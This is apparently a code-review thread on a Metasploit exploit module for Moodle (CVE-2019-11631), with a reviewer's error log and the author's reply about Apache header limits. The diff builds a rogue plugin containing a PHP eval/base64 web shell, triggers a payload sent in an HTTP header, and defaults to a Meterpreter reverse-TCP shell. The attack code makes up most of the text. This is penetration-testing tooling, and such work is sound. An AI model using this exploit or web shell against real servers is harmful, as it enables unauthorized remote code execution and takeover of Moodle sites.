modules/exploits/multi/http/moodle_admin_shell_upload.rb

```diff
@@ -0,0 +1,133 @@
+          This module will generate a plugin which can receive a malicious
+          payload request and upload it to a server running Moodle
+          provided valid admin credentials are used.  Then the payload
+          is sent for execution, and the plugin uninstalled.
+
+          You must have an admin account to exploit this vulnerability.
+
+          Successfully tested against 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+          'h00die' # msf module cleanup and inclusion
+        ],
+        'References' => [
+          ['URL', 'http://pentest.com.tr/exploits/Moodle-3-6-3-Install-Plugin-Remote-Command-Execution.html'],
+          ['EDB', '46775'],
+          ['CVE', '2019-11631'] # rejected, its a feature!
+        ],
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [['Automatic', {}]],
+        'Privileged' => false,
+        'DisclosureDate' => '2019-04-28',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp' },
+        'Payload' => {
+          'BadChars' => "'"
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'Admin username to authenticate with', 'admin']),
+        OptString.new('PASSWORD', [false, 'Admin password to authenticate with', ''])
+      ]
+    )
+  end
+
+  def create_addon_file
+    # There are syntax errors in creating zip file. So the payload was sent as base64.
+    plugin_file = Rex::Zip::Archive.new
+    header = Rex::Text.rand_text_alpha_upper(4)
+    plugin_name = Rex::Text.rand_text_alpha_lower(8)
+
+    print_status("Creating plugin named: #{plugin_name} with poisoned header: #{header}")
+
+    path = "#{plugin_name}/version.php"
+    path2 = "#{plugin_name}/lang/en/theme_#{plugin_name}.php"
+    # "$plugin->version" and "$plugin->component" contents are required to accept Moodle plugin.
+    plugin_file.add_file(path, "<?php $plugin->version = #{Time.now.to_time.to_i}; $plugin->component = 'theme_#{plugin_name}';")
+    plugin_file.add_file(path2, "<?php eval(base64_decode($_SERVER['HTTP_#{header}'])); ?>")
+    # plugin_file.add_file(path2, "<?php #{payload.encoded}) ?>")
+    return plugin_file.pack, header, plugin_name
+  end
+
+  def exec_code(plugin_name, header)
+    # Base64 was encoded in "PHP". This process was sent as "HTTP headers".
+    print_status('Triggering payload')
+    send_request_cgi({
+      'keep_cookies' => true,
+      'uri' => normalize_uri(target_uri.path, 'theme', plugin_name, 'lang', 'en', "theme_#{plugin_name}.php"),
+      'raw_headers' => "#{header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
```

Comment:
This seems to have an upper limit on the size of payload you can have
Attempted with `php/meterpreter_reverse_tcp`
```
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Date: Tue, 14 Sep 2021 16:31:41 GMT
Server: Apache/2.4.38 (Debian)
Content-Length: 354
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 172.29.0.6 Port 80</address>
</body></html>
```

Reply:
looks like the apache default limit is 8k.

http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize

I'll get this update in a day or two